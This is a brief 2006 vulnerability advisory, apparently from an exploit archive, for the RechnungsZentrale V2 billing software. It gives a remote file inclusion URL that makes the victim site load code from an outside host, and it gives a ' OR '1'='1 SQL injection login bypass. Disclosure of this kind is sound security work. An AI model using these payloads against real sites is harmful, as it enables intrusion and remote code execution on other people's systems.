RechnungsZentrale V2 <= 1.1.3 Remote Inclusion Vulnerability :

Date : 2006-04-19 Author : GroundZero Security
- GroundZero Security Research and Software Development 2006                     -

   Software:   RechnungsZentrale V2
   Version:    1.1.3, likely older versions are affected aswell.
   Vendor:     http://www.nfec.de/
   
   Remote Inclusion:
       http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4
   
   SQL Injection:
       User: ' OR '1'='1
       Password: 1   
   
- Bugs discovered by GroundZero Security Research and Software Development       -
- http://www.GroundZero-Security.com | Http://www.g-0.org                        -

# milw0rm.com [2006-04-19]

C1

 

C2

 

C3